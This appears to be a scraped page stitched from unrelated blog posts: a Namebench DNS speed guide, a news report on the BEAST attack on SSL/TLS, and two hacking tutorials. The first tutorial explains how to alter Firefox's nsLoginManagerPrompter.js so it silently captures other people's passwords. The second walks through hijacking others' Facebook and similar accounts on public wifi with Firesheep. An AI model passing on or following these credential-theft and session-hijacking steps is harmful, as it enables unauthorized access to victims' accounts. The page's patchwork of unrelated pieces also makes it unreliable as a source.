Most people use the default DNS settings provided by their ISP, and while they are usually sufficient for most purposes, there are plenty of free options out there, like OpenDNS and Google DNS. Namebench is a free app that checks to see whether your current settings are optimized and, if not, which free option is best for you. Here's how to use it: Download and install Namebench. Fire it up and choose your settings. Keep the top two boxes checked. If you're concerned about network censorship, check the third box, and if you want to help the developers, check the last box. You can tweak the rest if you're outside U.S. or want to experiment with different browsers.
Click Start Benchmark and wait while Namebench runs its tests. It should take several minutes. A browser tab should pop open when Namebench is done and give you a list of DNS servers and how much faster they are than the one you're currently using, unless yours are already the fastest possible. Namebench does not change your settings, but it's generally pretty easy to do it yourself. Check with the instructions you got from your ISP to set up your modem and/or router and just substitute the DNS addresses you received from Namebench for the addresses given by your ISP. It's best to do this with your router, as it will assign that DNS address for all the devices attached to it. That's it! This can dramatically improve your browsing speed, and it's fairly easy to work through.

Researchers discovered that the encryption that's supposed to protect us while surfing the web is totally exploitable by hackers with the necessary know-how.

Thai Duong and Juliano Rizzo plan to demonstrate a proof-of-concept code which will prove that SSL protocols are not as secure as everyone thought them to be.

The researchers claim that their Browser Exploit Against SSL/TLS code, or BEAST, will prove to the world that any cryptographic protocol before TLS 1.1 is vulnerable and can be deciphered fairly easily.

They will attempt to decode an authentication cookie used to log-in to a PayPal account, fact which will diminish the world's faith in one of the foundation blocks of internet security.

Even though later protocols, such as the TLS 1.1 and 1.2 don't present the same weakness, these versions are yet to be implemented into websites and browser applications, which means that most popular websites are unprotected.

The algorithm was laid down in the form of a JavaScript that intercepts encrypted cookies transferred by websites during the authentication process.

“BEAST is different than most published attacks against HTTPS,” stated Duong.

“While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”

What up until now has been considered to be more of a theoretical weakness has now become something real that puts us all in peril. BEAST is supposed to decrypt the authentication cookie used to access a PayPal account in 10 minutes, which is far less than anyone would expect.

So why don't website and browser developers do something about it, especially since TLS 1.1 is available since 2006?

In order to efficiently update all the security protocols, the process would have to be done by all the major players at once, otherwise, whenever a fix is attempted, incompatibilities will prevent applications that rely on the old system to work.

Out of all the browsers currently available, only Opera implements TLS 1.2 by default, while in Internet Explorer the technology is there, but lies dormant, waiting to be manually activated.

Google Chrome and Mozilla Firefox seem to be the last in this race as they seem to be waiting for each other to start the implementation.

Hello all!
Everyone wants to hack his friends and other people facebook,orkut,yahoo,msn or gmail accounts.Now i am giving you a small trick and after applying this trick Firefox will store all the passwords without promting the person who is typing his/her password to login. So in this way you will get victim password and username. But physical access is important for this hack.

Follow this Guide to Convert Firefox Into Stealer and Hack Passwords:

1. Close Firefox

2) Navigate to:

Windows - C:/Program Files/Mozilla Firefox/Components
Mac - Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components

3) We are going to edit a file called nsLoginManagerPrompter.js, it is recommended you create a copy of it by pasting original file somewhere so you can replace the original file when you want to turn off this feature.

I recommend you download the following file and simply overwrite the existing nsLoginManagerPrompter.js with it,this file is already edited and works well

Download Edited nsLoginManagerPrompter.js
(skip the add from the upper right corner)

From now on, when someone logs onto any site, they username and password will be saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes!

Recently a new FireFox add-on Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account in which victim is logged in.

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How can firesheep be used to hack any Facebook Account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:-

• Public wifi access
• winpcap
  
• Firesheep(Download)

Method to Hijack Sessions Using Firesheep:-

1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser
2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep
3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly
So how was this extension? Hope you liked it ;)